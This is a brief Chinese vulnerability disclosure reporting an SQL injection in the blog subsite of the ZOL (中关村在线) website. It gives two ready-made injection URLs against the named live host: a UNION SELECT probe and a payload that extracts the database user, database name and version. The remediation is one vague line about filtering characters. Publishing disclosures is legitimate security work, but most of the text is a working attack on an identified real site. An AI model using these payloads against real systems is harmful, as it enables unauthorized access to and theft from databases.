中关村在线博客子站SQL注入及修复方案
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--
修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/loudongfenxi/149437.html
